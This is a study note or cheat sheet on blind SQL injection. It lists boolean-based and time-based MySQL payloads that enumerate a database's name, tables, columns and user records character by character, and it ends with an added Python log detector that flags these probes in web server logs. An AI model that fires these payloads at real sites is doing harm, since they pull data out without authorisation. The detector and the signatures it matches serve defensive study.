Blind injection

Boolean-based blind injection

Guessing the database

Guess the length of the database name
id=1 and length(database())=4 --+

Guess the database name (one character at a time)
id=1 and ascii(substr(database(),1,1))=115 --+
Guessing tables
Guess the number of tables
id=1 and (select count(table_name) from information_schema.tables where table_schema=database())=1 --+

Guess the length of a table name
id=1 and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1 --+

Guess the table name (one character at a time)
id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101 --+
Guessing columns
Guess the number of columns
id=1 and (select count(column_name) from information_schema.columns where table_name='users')=1

Guess the length of a column name
id=1 and length(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1))=1

Guess the column name (one character at a time)
id=1 and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))=85 --+
Guessing contents
Guess the length of a value (either form works)
length((select username from users limit 0,1))=1
(select length(username) from users limit 0,1)=1

Guess the value (one character at a time)
id=1 and ascii(substr((select username from users limit 0,1),1,1))=68 --+

Note:

mid()/substr() positions start at 1; limit offsets start at 0.


Time-based blind injection

id=1 or if(ascii(substr(database(),1,1))>0,sleep(1),1) --+

id=1 union select 1,benchmark(1000000,md5('test')),1 from user where userid=1 and ord(substring(username,1,1))=97 /*
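Seen from the defender's side, every probe above leaves the same footprint in the web server log: a numeric parameter carrying ascii(substr(...)), length(...), information_schema or sleep()/benchmark(), repeated many times with only the compared number changing. The following is an added example, not part of the original cheat sheet: a small Python detector that URL-decodes request parameters from constructed access-log lines (the IPs, paths and timestamps are made up), tags each request with the blind-injection primitive it matches, and then groups requests whose payload differs only in its integers, which is the telltale shape of character-by-character extraction.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (not taken from the original page); the 'id'
# parameter carries the same kinds of probes the cheat sheet lists.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /item.php?id=1 HTTP/1.1" 200 710
10.0.0.5 - - [01/Jan/2024:12:00:01 +0000] "GET /item.php?id=1%20and%20length(database())=8%20--+ HTTP/1.1" 200 710
10.0.0.5 - - [01/Jan/2024:12:00:02 +0000] "GET /item.php?id=1%20and%20ascii(substr(database(),1,1))=115%20--+ HTTP/1.1" 200 710
10.0.0.5 - - [01/Jan/2024:12:00:03 +0000] "GET /item.php?id=1%20and%20ascii(substr(database(),1,1))=116%20--+ HTTP/1.1" 200 710
10.0.0.5 - - [01/Jan/2024:12:00:04 +0000] "GET /item.php?id=1%20or%20if(ascii(substr(database(),1,1))>0,sleep(1),1)%20--+ HTTP/1.1" 200 710
10.0.0.7 - - [01/Jan/2024:12:00:05 +0000] "GET /item.php?id=42 HTTP/1.1" 200 710
"""

# Signatures of the blind-injection primitives used above; matched on the
# URL-decoded parameter value, case-insensitively.
SIGNATURES = {
    "boolean_char_probe": re.compile(r"ascii\s*\(\s*substr", re.I),
    "length_probe": re.compile(r"\blength\s*\(", re.I),
    "schema_enum": re.compile(r"information_schema\.(tables|columns)", re.I),
    "time_delay": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
}
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/')


def scan_log(log_text):
    """One finding per request parameter whose decoded value matches a signature."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        # parse_qs decodes %20 and '+', so '--+' arrives as '-- ' just as MySQL sees it.
        for name, values in parse_qs(urlsplit(target).query).items():
            for value in values:
                tags = sorted(t for t, rx in SIGNATURES.items() if rx.search(value))
                if tags:
                    findings.append({"ip": ip, "param": name, "value": value, "tags": tags})
    return findings


def probe_templates(findings):
    """Count findings per (ip, param, payload with every integer masked as N);
    a template repeated with only the number changing is char-by-char extraction."""
    counts = Counter()
    for f in findings:
        counts[(f["ip"], f["param"], re.sub(r"\d+", "N", f["value"]))] += 1
    return counts
```

Run scan_log over a real log and alert when probe_templates reports a high count for one template from one client; the single-request tags alone will also fire on legitimate traffic far less often than the repetition pattern does.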